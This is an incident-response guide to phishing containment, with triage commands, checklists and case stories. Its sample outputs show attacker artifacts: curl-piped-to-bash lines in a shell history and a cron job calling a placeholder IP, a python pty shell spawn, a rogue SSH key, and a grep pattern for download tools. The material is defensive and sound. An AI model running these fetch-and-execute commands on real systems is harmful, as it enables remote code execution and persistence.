It usually doesn’t start with malware fireworks. It starts with a normal Tuesday: an invoice, a shared document, a meeting update. Someone clicks. Nothing obvious happens. The user shrugs and goes back to work.
Meanwhile, you just handed a stranger a toehold inside your identity systems—the place where “security” becomes “who are you, really?” That click doesn’t have to be fatal. But the way most companies are built—too much implicit trust, too many long-lived credentials, too much shared infrastructure—turns a small mistake into a front-page mess.
The headline path: click → creds → movement → impact
Phishing is not “an email problem.” It’s an identity and authorization problem that begins in email and ends wherever your organization trusts identity too much.
The modern phishing chain usually looks like one of these:
- Credential harvest: user enters credentials into a fake login page. Attacker uses them immediately, often from cloud infrastructure close to your region.
- OAuth consent abuse: user authorizes a malicious app (“View document”) that requests permissions in Microsoft 365/Google Workspace. No password stolen; tokens do the work.
- Session hijack: attacker steals session cookies or refresh tokens via adversary-in-the-middle tooling or malware. MFA gets politely stepped around.
- Attachment execution: user runs a file that drops an agent. Classic, but still alive. Macro blocking helped; attackers moved to LNK, ISO, OneNote, HTML smuggling, and “signed-but-evil” loaders.
Why one click becomes a company incident
Because your internal architecture probably has at least three of these “headline accelerators”:
- Overprivileged identities: the user can access too much; the user’s tokens can access even more; service accounts are a horror novella.
- Flat networks: segmentation exists on a slide, not on the wire.
- Weak detection: logs are missing, not centralized, or not queryable at 2 a.m.
- Recoverability gaps: backups exist, but restore time is measured in “weeks plus prayer.”
- Trusting email as a control plane: password resets, invoice approvals, bank detail changes—done over email because “it’s faster.”
Attackers don’t need sophistication if your environment is generous. They take the shortest path to money: invoice fraud, payroll diversion, ransomware, data theft, extortion.
One quote worth stapling to your runbooks, often attributed to Gen. Gordon R. Sullivan: “Hope is not a strategy.” You can’t hope your users won’t click; you design systems that survive when they do.
Joke #1: Phishing emails are the only “urgent” requests that always arrive right after you pour coffee. The universe has impeccable timing and zero empathy.
Interesting facts and historical context (the uncomfortable kind)
- Phishing isn’t new: the term traces back to mid-1990s AOL scams targeting usernames and passwords. What changed is scale and automation.
- MFA didn’t kill phishing: it shifted attackers toward session hijacking, push fatigue, and OAuth consent abuse—identity-native bypasses.
- Business email compromise (BEC) is often “malware-free”: many cases involve only stolen credentials and inbox rules, which means AV can be perfectly green while your bank details quietly change.
- Attackers love “living off the land”: PowerShell, WMI, scheduled tasks, and legitimate remote tools reduce the need for obvious malware binaries.
- Cloud logs became the new perimeter telemetry: sign-in events, token grants, and mailbox rule changes often show the first real evidence of compromise.
- DNS is still a weak link: domain lookalikes and recently registered domains are common; many environments don’t block newly observed domains by policy.
- Ransomware crews professionalized: double extortion (encrypt + leak) became a business model; phishing is one of the cheapest initial access vectors.
- Email authentication evolved slowly: SPF and DKIM helped, but without strict DMARC enforcement, spoofing and lookalikes remain effective.
- Backups became a target: attackers routinely seek admin consoles, backup repositories, and snapshot deletion rights early in the intrusion.
Three mini-stories from the corporate trenches
Mini-story #1: The incident caused by a wrong assumption
The company had “MFA everywhere.” That was the phrase. It showed up in board decks and vendor questionnaires. The security team believed it too, because for interactive logins to the main SSO portal, MFA was enforced.
A finance analyst received a convincing “shared spreadsheet” email. The link went to a reverse-proxy login page. The analyst typed credentials and approved the MFA push. The attacker captured the session cookie and immediately used it from a clean cloud VM. No brute force. No impossible travel alert, because the attacker proxied through a region close to the victim.
The wrong assumption was subtle: “MFA means the attacker can’t log in.” In reality, MFA protected the authentication ceremony, not the session after. Once the session token existed, the attacker rode it like a stolen valet ticket.
They spent two days looking for malware on endpoints. There was none. The attacker changed mailbox rules to hide replies, initiated vendor payment changes, and used the account to phish internally. The first real indicator was a suspicious OAuth token grant in the identity logs—found late because those logs weren’t ingested into the SIEM. Identity was the breach; endpoints were just witnesses.
Mini-story #2: The optimization that backfired
IT wanted fewer tickets. They implemented a “streamlined” password reset flow: managers could approve password resets by email for their direct reports. It reduced helpdesk workload and made onboarding smoother. Everyone applauded. Automation! Efficiency! Fewer humans!
Then a senior manager got phished. The attacker didn’t need admin access. They only needed that manager’s mailbox. With it, they approved a password reset for a privileged account under the manager’s chain. The attacker took over the privileged account, then used it to add new MFA methods, register new devices, and create persistent access.
It wasn’t a technical exploit. It was a process exploit. The “optimization” made email a security control plane. Email is not a secure control plane; it’s a postcard that sometimes arrives.
The fix was boring: remove email-based approvals for resets, require out-of-band verification, enforce privileged account separation, and add workflow-based approvals inside an authenticated system with audit trails. Yes, it created tickets again. Tickets are cheaper than headlines.
Mini-story #3: The boring but correct practice that saved the day
A mid-sized SaaS company had a habit that wasn’t glamorous: quarterly restore tests. Not “we checked the backup job succeeded.” Actual restores into an isolated environment. They treated restore time as an SLO.
When a developer clicked a phish that led to an endpoint compromise, the attacker eventually reached the virtualization cluster and attempted to encrypt file shares. They also tried to access the backup system, but it required separate credentials, enforced MFA, and lived in a management network with tight firewall rules. Snapshots were immutable for a retention window. Deletion required a second approval and a different admin role.
The attacker still caused damage: some shares were encrypted, and a few systems needed rebuilds. But recovery was measured in hours, not weeks. They restored clean data, rotated credentials, and used the incident to tighten conditional access policies.
Nothing about it was flashy. These were the kinds of controls that don’t demo well. And they worked, because reliability is mostly the art of being uninteresting at scale.
Joke #2: The only thing that scales faster than cloud resources is the confidence of someone who just clicked “Enable content.”
Fast diagnosis playbook: find the bottleneck in minutes
You’re on-call. Someone reports a suspicious email and “I entered my password.” Or you see a spike in failed logins, or a finance wire looks wrong. The goal isn’t perfect attribution. The goal is to stop the bleeding fast, then understand what happened.
First 15 minutes: stop the spread, preserve evidence
- Identify the user and the time window: get the recipient address, click time, device used, and whether credentials were entered or MFA approved.
- Disable sign-in or force token revocation: lock the identity down before you chase endpoints.
- Check for mailbox rules and forwarding: this is where BEC hides.
- Scope sign-ins: new IPs, new devices, new user agents, new countries/ASNs, sign-ins to admin portals.
- Look for OAuth app grants: “consent” can be persistence.
Next 60 minutes: determine blast radius
- Check lateral movement: new SSH keys, new local admins, new scheduled tasks, RDP events, unusual WinRM usage.
- Check privileged systems: identity admin accounts, backup consoles, hypervisor management, password vaults.
- Check egress: unusual outbound connections, data transfers, large downloads from file stores.
- Hunt for the phishing email: who else received it, who clicked, who entered creds.
Third phase: recovery and hardening
- Rotate credentials: user passwords, API keys, service account secrets, and any tokens you can invalidate.
- Rebuild where needed: don’t “clean” critical compromised hosts unless you have mature forensics and a reason.
- Fix the control that failed: DMARC policy, conditional access, admin separation, network segmentation, backup immutability.
- Write the postmortem like an engineer: timeline, detection gap, containment actions, and a short list of changes that will actually get done.
Practical tasks with commands: verify, decide, act
These are hands-on checks you can run during triage. Each one includes what the output means and the decision you make. Adjust hostnames, usernames, and paths to your environment.
Task 1: Confirm whether the user’s machine is making suspicious outbound connections (Linux)
cr0x@server:~$ sudo ss -tpn | head -n 12
ESTAB 0 0 10.20.5.34:48212 104.21.14.55:443 users:(("chrome",pid=2314,fd=123))
ESTAB 0 0 10.20.5.34:48244 203.0.113.44:443 users:(("curl",pid=2891,fd=3))
ESTAB 0 0 10.20.5.34:39510 10.20.0.15:389 users:(("sssd",pid=1120,fd=14))
What it means: You’re looking for unexpected processes talking to the internet (e.g., curl, python, unknown binaries) or rare destinations. The LDAP connection is normal; curl to a public IP might not be.
Decision: If you see suspicious processes or destinations, isolate the host (EDR network containment or firewall quarantine) and capture process details before killing anything.
Task 2: Check DNS resolution history via systemd-resolved (Linux)
cr0x@server:~$ sudo journalctl -u systemd-resolved --since "2 hours ago" | grep -iE "query|reply" | tail -n 8
Jan 22 09:18:11 host systemd-resolved[713]: Querying A phishing-docs-login.com IN A on 10.20.0.53
Jan 22 09:18:11 host systemd-resolved[713]: Reply received from 10.20.0.53 for phishing-docs-login.com IN A: 203.0.113.44
What it means: A recent query for a suspicious domain, and the resolved IP. Note that systemd-resolved only logs individual queries at debug verbosity; if nothing shows up here, pivot to your DNS server or proxy logs instead. Either way, the domain and IP become your pivot for proxy searches and firewall blocks.
Decision: Block the domain and resolved IP at your DNS security layer / proxy, then search for other clients querying it.
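If the recursive resolver you control is unbound (an assumption; adapt this for whatever DNS layer you actually run), a minimal sinkhole entry looks like the following. The drop-in file name is illustrative.
cr0x@server:~$ printf 'server:\n    local-zone: "phishing-docs-login.com" always_nxdomain\n' | sudo tee /etc/unbound/unbound.conf.d/ir-blocklist.conf
server:
    local-zone: "phishing-docs-login.com" always_nxdomain
cr0x@server:~$ sudo unbound-checkconf && sudo systemctl reload unbound
Clients using this resolver now get NXDOMAIN for the domain. It does nothing for hosts pointed at external DNS, so pair it with proxy and firewall blocks.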
Task 3: Determine whether the host recently downloaded and executed a file (Linux bash history is not proof, but it’s a clue)
cr0x@server:~$ sudo grep -R "curl\|wget\|bash -c" /home/*/.bash_history 2>/dev/null | tail -n 5
/home/alex/.bash_history:curl -fsSL http://203.0.113.44/a.sh | bash
What it means: Someone ran a classic “pipe to bash” command. That’s either an attacker or a developer having a very bad day.
Decision: Treat as compromise. Isolate host, acquire forensic artifacts, and begin credential rotation for any secrets reachable from that host.
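To turn “any secrets reachable from that host” into a concrete rotation list, a rough sweep helps. Paths and patterns below are illustrative; a proper secret scanner or your EDR inventory is better if you have one.
cr0x@server:~$ sudo grep -rlE "BEGIN (RSA|OPENSSH|EC) PRIVATE KEY|aws_secret_access_key" /home /etc /opt 2>/dev/null | head -n 20
cr0x@server:~$ sudo ls -la /home/alex/.ssh /home/alex/.aws /home/alex/.kube 2>/dev/null
Everything that shows up (private keys, cloud credentials, kubeconfigs) goes on the rotation list, not the “probably fine” list.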
Task 4: Find recent new local admin additions (Linux)
cr0x@server:~$ sudo journalctl --since "24 hours ago" | grep -E "useradd|usermod|groupadd|gpasswd" | tail -n 10
Jan 21 23:10:07 host usermod[8123]: add 'alex' to group 'sudo'
What it means: A user was added to sudo. That’s a privilege escalation indicator if unexpected.
Decision: Verify change ticket. If no legitimate reason, remove membership, rotate credentials, and widen hunting for similar events.
Task 5: Check SSH authorized keys for unexpected additions (Linux)
cr0x@server:~$ sudo find /home -maxdepth 3 -name authorized_keys -type f -exec ls -l {} \; -exec tail -n 2 {} \;
-rw------- 1 alex alex 392 Jan 22 09:20 /home/alex/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP0F... attacker@vm
What it means: A new SSH key recently added is a common persistence mechanism.
Decision: Remove the key, check auth logs for logins using it, and rotate any keys or tokens stored in that home directory.
Task 6: Inspect authentication logs for anomalous SSH logins (Linux)
cr0x@server:~$ sudo grep "Accepted" /var/log/auth.log | tail -n 6
Jan 22 09:22:31 host sshd[9211]: Accepted publickey for alex from 203.0.113.44 port 51322 ssh2: ED25519 SHA256:Qm...
What it means: Successful login from a public IP. If that host should be internal-only, this is critical.
Decision: Block the source IP, verify firewall exposure, rotate user keys, and inspect what commands ran after login (shell history, auditd, process accounting).
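To see what the session actually did, last confirms the login window, and if auditd is running with execve rules (an assumption, not a default on most distros), aureport summarizes what ran:
cr0x@server:~$ last -Fi alex | head -n 5
cr0x@server:~$ sudo aureport -x -ts today --summary | head -n 15
Without auditd or EDR you are reconstructing from shell history and file timestamps, which is a weak basis for trusting the host.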
Task 7: Find suspicious scheduled tasks / cron jobs (Linux)
cr0x@server:~$ sudo crontab -l
*/5 * * * * /usr/bin/curl -fsSL http://203.0.113.44/.x | /bin/bash
What it means: Persistence. Also, audacity.
Decision: Remove the cron entry, isolate the host, and search fleet-wide for similar patterns. Check /etc/cron.d, per-user crontabs (crontab -l -u <user>), and systemd timers as well; persistence rarely lives in only one place.
Task 8: Identify suspicious processes and their parent chain (Linux)
cr0x@server:~$ ps -eo pid,ppid,user,cmd --sort=start_time | tail -n 8
2891 2314 alex curl -fsSL http://203.0.113.44/a.sh
2893 2891 alex /bin/bash
2899 2893 alex python3 -c import pty;pty.spawn("/bin/bash")
What it means: A curl download launching bash, which spawns Python and a TTY. That’s a typical interactive attacker workflow.
Decision: Capture memory/process details if you have tooling; otherwise isolate and rebuild. Don’t “poke” the attacker for fun in production.
Task 9: Check for suspicious outbound connections at the firewall (pfSense example via logs on a syslog host)
cr0x@server:~$ sudo grep "block" /var/log/pfsense.log | grep "203.0.113.44" | tail -n 5
Jan 22 09:25:10 fw filterlog: 5,,,1000000103,igb1,match,block,in,4,0x0,,64,0,0,DF,6,tcp,60,10.20.5.34,203.0.113.44,48244,443,0,S,123456789,,64240,,mss;sackOK;TS;nop;wscale
What it means: A block event confirms the host attempted to connect to a suspicious IP. If you see allows, it’s worse.
Decision: If traffic is allowed, add a block rule and check proxy logs for payload downloads. If blocked, proceed with host investigation—attempts still matter.
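If you need the traffic dead right now and the perimeter change has to wait, a host-level (or Linux-gateway) nftables block is a reasonable stopgap; this sketch assumes there is no existing ruleset you would rather extend:
cr0x@server:~$ sudo nft add table inet ir
cr0x@server:~$ sudo nft 'add chain inet ir out { type filter hook output priority 0; policy accept; }'
cr0x@server:~$ sudo nft add rule inet ir out ip daddr 203.0.113.44 drop
It only protects the box it runs on, and attacker infrastructure rotates quickly, so treat it as a tourniquet, not the fix.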
Task 10: Verify DMARC policy status for your domain (DNS query)
cr0x@server:~$ dig +short TXT _dmarc.example.com
"v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com; ruf=mailto:dmarc-fail@example.com; fo=1"
What it means: p=none is monitoring only. You’re wearing a helmet but not buckling it.
Decision: Plan a staged move to p=quarantine then p=reject after validating legitimate senders. Track false positives before enforcing.
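For illustration, a staged enforcement record could look like the output below. The pct tag applies the policy to a fraction of failing mail, which lets you ramp up without breaking a forgotten newsletter platform; the values are examples, not a universal recommendation.
cr0x@server:~$ dig +short TXT _dmarc.example.com
"v=DMARC1; p=quarantine; pct=25; rua=mailto:dmarc-reports@example.com; fo=1"
Raise pct toward 100, then move to p=reject once the aggregate reports stop surprising you.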
Task 11: Sanity-check Postfix restrictions (server-side)
cr0x@server:~$ sudo postconf -n | grep -E "smtpd_sender_restrictions|smtpd_recipient_restrictions"
smtpd_sender_restrictions = reject_unknown_sender_domain
smtpd_recipient_restrictions = permit_mynetworks,reject_unauth_destination
What it means: This validates server restrictions; it won’t show per-user mailbox rules (those live in your mail platform). But it tells you whether your MTA is an open relay or permissive.
Decision: If you see permissive relay behavior, fix immediately. If server config is sane, focus on cloud mailbox rules and identity logs.
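On Postfix 3.x, relaying is also gated by smtpd_relay_restrictions, so print it alongside mynetworks. The output below is illustrative; your values will differ.
cr0x@server:~$ sudo postconf smtpd_relay_restrictions mynetworks
smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination
mynetworks = 127.0.0.0/8 [::1]/128
The question to ask is whether permit_mynetworks covers more address space than you intend.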
Task 12: Confirm backups are restorable and not silently failing (ZFS example)
cr0x@server:~$ sudo zpool status -x
all pools are healthy
What it means: The pool reports healthy. This is necessary, not sufficient; a “healthy” pool can still contain encrypted garbage if you backed up encrypted files.
Decision: If unhealthy, fix storage first. If healthy, proceed to verify snapshot presence and perform a restore test.
Task 13: Verify immutable-ish retention via ZFS snapshots (existence and age)
cr0x@server:~$ sudo zfs list -t snapshot -o name,creation -s creation | tail -n 5
tank/backups@auto-2026-01-22_0900 Wed Jan 22 09:00 2026
tank/backups@auto-2026-01-22_1000 Wed Jan 22 10:00 2026
What it means: You have recent snapshots. If snapshots stop or are missing, attackers might have touched scheduling—or you have a boring reliability issue that becomes a security issue.
Decision: If snapshots exist and are protected (access controls!), plan restores from a snapshot taken before compromise. If missing, assume backup integrity risk and escalate.
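If you want a known-good snapshot to survive both fat fingers and hostile admins while the incident is live, put a ZFS hold on it (the tag name is arbitrary):
cr0x@server:~$ sudo zfs hold ir-keep tank/backups@auto-2026-01-22_0900
cr0x@server:~$ sudo zfs holds tank/backups@auto-2026-01-22_0900
NAME                               TAG      TIMESTAMP
tank/backups@auto-2026-01-22_0900  ir-keep  Wed Jan 22 10:30 2026
A held snapshot cannot be destroyed until the hold is released. That is not true immutability (root can still release it), but it is one more deliberate step between an attacker and your recovery point.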
Task 14: Test an actual restore to validate backup usability (ZFS clone)
cr0x@server:~$ sudo zfs clone tank/backups@auto-2026-01-22_0900 tank/restore-test
cr0x@server:~$ sudo ls -lah /tank/restore-test | head -n 5
total 24K
drwxr-xr-x 6 root root 6 Jan 22 09:00 .
drwxr-xr-x 3 root root 3 Jan 22 10:12 ..
-rw-r--r-- 1 root root 12K Jan 22 08:58 accounts.db
What it means: You can materialize a point-in-time view without modifying the original snapshot. This is exactly how you reduce panic during ransomware recovery.
Decision: If restore works, you have a viable recovery path. If it fails, you don’t have backups—you have optimism stored on disk.
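When the drill is over, remove the clone so stale test data does not linger, and record the wall-clock time from “decision to restore” to “data verified”; that number is your real RTO, not the one in the slide deck.
cr0x@server:~$ sudo zfs destroy tank/restore-test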
Task 15: Spot sudden disk churn that could indicate encryption activity (Linux)
cr0x@server:~$ iostat -xm 1 3
Linux 6.5.0 (fileserver) 01/22/2026 _x86_64_ (8 CPU)
Device r/s w/s rMB/s wMB/s avgrq-sz avgqu-sz await %util
nvme0n1 5.00 820.00 0.20 110.50 270.0 7.20 8.60 98.00
What it means: Heavy sequential writes with high utilization can be backups… or mass encryption. Context matters: which process is writing?
Decision: Correlate with process I/O (next task). If it’s unexpected, isolate the host or revoke share access immediately.
Task 16: Identify which process is hammering the disk (Linux)
cr0x@server:~$ sudo iotop -b -n 1 | head -n 12
Total DISK READ: 0.00 B/s | Total DISK WRITE: 120.00 M/s
PID PRIO USER DISK READ DISK WRITE SWAPIN IO> COMMAND
8122 be/4 www-data 0.00 B/s 95.00 M/s 0.00 % 99.00 % /usr/bin/python3 /tmp/enc.py
What it means: A suspicious script writing at high throughput. That’s your smoking gun.
Decision: Contain now. Kill the process after capturing artifacts if you can do so safely. Prefer network isolation and snapshotting volumes for forensics where available.
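If the affected shares live on ZFS (an assumption; the dataset name is illustrative), snapshot them before containment so forensics gets an untouched point-in-time copy:
cr0x@server:~$ sudo zfs snapshot tank/shares@ir-2026-01-22-precontainment
cr0x@server:~$ sudo zfs list -t snapshot -o name,creation | grep precontainment | tail -n 1
tank/shares@ir-2026-01-22-precontainment  Wed Jan 22 10:05 2026
Snapshots are cheap and instant; taking one costs you nothing even if forensics never needs it.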
Common mistakes: symptoms → root cause → fix
1) “We have MFA, so this can’t be account takeover”
Symptoms: Legitimate MFA approvals but suspicious sign-ins; users insist they “did MFA once and then nothing.”
Root cause: Session hijacking / token theft, or OAuth consent grants that create long-lived access.
Fix: Enforce phishing-resistant MFA for high-risk users (FIDO2/WebAuthn), reduce session lifetimes, use conditional access (device compliance, risk-based), alert on new OAuth grants and token anomalies.
2) “No malware found, so it’s fine”
Symptoms: Finance fraud, hidden mailbox rules, weird email conversations, but endpoints scan clean.
Root cause: BEC is often identity-only; the attacker lives in cloud mail and uses rules/forwarding to hide.
Fix: Inspect mailbox rules, forwarding settings, OAuth apps, sign-in history, and admin activity logs. Treat identity telemetry as first-class security data.
3) “We blocked the domain; incident closed”
Symptoms: Security closes after adding a DNS block; weeks later, another account shows similar behavior.
Root cause: The phishing domain was just the on-ramp. Credentials/tokens are already stolen. Also, attackers rotate domains fast.
Fix: Force credential resets, revoke sessions, review inbox rules, and hunt for related recipients/clickers. Focus on identities and persistence mechanisms.
4) “Our backups are good; jobs are green”
Symptoms: During recovery, restores fail or are too slow; backup console access is suspiciously easy.
Root cause: No restore testing, no immutability, backups share admin plane with production, or backup credentials are reused.
Fix: Implement immutable snapshot retention (where possible), separate backup admin accounts, isolate backup networks, and run restore drills with measured RTO.
5) “We can just clean the host”
Symptoms: Re-infection, repeated callbacks, reappearance of scheduled tasks or startup items.
Root cause: Persistence not fully removed; credentials reused; attacker still has identity access.
Fix: Prefer rebuild for high-value systems; rotate credentials broadly; validate IAM and tokens; re-image endpoints used for privileged actions.
6) “Segmentation is too hard; we’ll do it later”
Symptoms: One user compromise leads to access to file shares, management networks, and backup systems.
Root cause: Flat network and shared admin paths; implicit trust inside.
Fix: Segment management planes, enforce jump hosts, restrict east-west traffic, and require separate privileged identities.
Checklists / step-by-step plan
Containment checklist (same day)
- Disable affected user sign-in and revoke sessions/tokens in your identity provider.
- Reset the user’s password and any related recovery factors; remove newly added MFA methods.
- Inspect and remove mailbox forwarding, inbox rules, delegate access, and suspicious OAuth app consents.
- Search for the phishing email across mailboxes; quarantine it; identify other recipients and clickers (a quick mail-log sketch follows this checklist).
- Isolate the endpoint if there’s any sign of execution, persistence, or unusual outbound traffic.
- Block domains/IPs associated with the phishing infrastructure at DNS/proxy/firewall layers.
- Check privileged systems: admin portals, backup consoles, hypervisors, password vault access logs.
- Start a timeline: first click, first suspicious sign-in, first policy change, first data access.
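For the recipient hunt flagged above: your mail platform’s message trace is authoritative, but if mail also passes through a Postfix relay you control (as in Task 11), the mail log gives a fast first cut. The domain and addresses here are illustrative.
cr0x@server:~$ sudo grep -i "phishing-docs-login.com" /var/log/mail.log | grep -oE "to=<[^>]+>" | sort -u | head -n 10
to=<alex@example.com>
to=<finance@example.com>
Everyone on that list gets the same treatment as the original reporter: check sign-ins, check mailbox rules, and ask whether they entered credentials.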
Eradication checklist (this week)
- Rotate credentials for exposed systems: API keys, service accounts, SSH keys, database passwords.
- Remove unauthorized persistence: cron jobs, scheduled tasks, startup items, new admin users, SSH keys.
- Rebuild compromised hosts; validate golden images; patch baseline vulnerabilities.
- Hunt for related activity across the fleet (same domains, same IPs, same OAuth app IDs, same user agent patterns); a sweep sketch follows this checklist.
- Confirm backups are intact and restorable; perform an isolated restore test from a pre-incident snapshot.
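A blunt version of the fleet sweep referenced above, keyed on indicators from the first host (the attacker IP in cron entries and authorized_keys). It assumes a hosts.txt inventory and non-interactive sudo over SSH; an EDR or configuration-management query is the better tool if you have one.
cr0x@server:~$ while read -r h; do ssh -o ConnectTimeout=5 "$h" 'sudo grep -l "203.0.113.44" /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /home/*/.ssh/authorized_keys 2>/dev/null' | sed "s|^|$h: |"; done < hosts.txt
fileserver02: /var/spool/cron/crontabs/root
Any line of output is another host that goes through the same containment and eradication steps.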
Hardening checklist (this quarter)
- Move DMARC from p=none to enforcement in staged steps; inventory legitimate senders first.
- Require phishing-resistant MFA for admins and finance; reduce session lifetimes for high-risk roles.
- Separate privileged accounts: no email, no browsing, no Slack, no “daily driver” usage.
- Implement conditional access: device compliance, location risk, impossible travel alerts, and token protection where available.
- Segment networks: management plane isolation, restricted SMB/RDP/SSH, and egress filtering by role.
- Protect backups: separate admin plane, immutable retention, and deletion controls requiring a different role.
- Centralize logs: identity sign-ins, mailbox changes, endpoint events, proxy/DNS, and backup admin actions.
- Run incident drills: table-top plus at least one practical “disable user + revoke tokens + restore data” exercise.
FAQ
1) If a user clicked but didn’t enter credentials, is it still an incident?
Maybe. A click can still trigger drive-by downloads, OAuth consent prompts, or redirect chains. Treat it as a potential incident: check sign-ins, endpoint telemetry, and whether a file was downloaded or executed.
2) What’s the first account action you take after confirmed credential entry?
Revoke sessions/tokens and disable sign-in (temporarily). Password reset alone can leave active sessions alive. You want to cut off live access first, then rotate credentials.
3) Why do attackers change mailbox rules?
To hide. They’ll auto-archive replies, forward threads to external mailboxes, or suppress messages containing keywords like “invoice,” “wire,” or “payment.” It’s low-tech, high-impact persistence.
4) Does DMARC stop phishing?
It stops some spoofing of your exact domain when enforced. It doesn’t stop lookalike domains, compromised vendor accounts, or attacker-owned domains. Still: enforce it. It’s table stakes and reduces your brand being used as a weapon.
5) Why do “MFA everywhere” programs still get owned?
Because not all MFA is equal, and sessions are valuable. Push MFA can be fatigued, proxied, or bypassed with stolen tokens. Phishing-resistant MFA plus conditional access and short sessions materially changes the attacker’s economics.
6) Should we isolate the endpoint immediately?
If there’s any sign of execution, persistence, or suspicious outbound connections, yes. If it’s strictly credential theft with no endpoint signs, focus first on identity containment—then check the endpoint without disrupting evidence unnecessarily.
7) When do you rebuild versus clean a host?
Rebuild when the host is privileged, internet-facing, or shows signs of attacker tooling/persistence. “Cleaning” is fine for low-risk endpoints if you have strong EDR and verified containment, but rebuild is often cheaper than uncertainty.
8) How do backups fit into phishing, specifically?
Phishing is often the initial access that leads to ransomware. Ransomware is an availability incident. If backups aren’t immutable, segmented, and tested, your recovery plan becomes a public relations plan.
9) What’s the most overlooked log source during phishing response?
Identity provider and email admin audit logs: sign-ins, token grants, mailbox rule changes, forwarding changes, and admin role assignments. That’s where the attacker lives when they’re being “quiet.”
Conclusion: next steps you can do this week
If you want fewer headlines, stop treating phishing as a user training problem. Training helps, but architecture wins. The click is inevitable; the catastrophe is optional.
Do these next:
- Make identity logs non-optional: ingest sign-ins, token grants, and mailbox audit events into your central logging so you can answer “what happened?” quickly.
- Harden the roles that move money and hold keys: finance, admins, and backup operators get phishing-resistant MFA and shorter sessions.
- Fix email’s authority problem: stop approving high-risk actions by email. Move approvals into authenticated systems with strong audit trails.
- Prove your restores: run at least one restore test from a known-good snapshot and time it. If you can’t restore fast, you can’t recover—only negotiate.
- Write a one-page playbook: disable user, revoke tokens, check mailbox rules, hunt recipients, isolate endpoints. Make it runnable by whoever is awake.
Phishing isn’t going away. But you can make “one click” a ticket, not a takeover. That’s the difference between an internal incident report and a news cycle with your logo in it.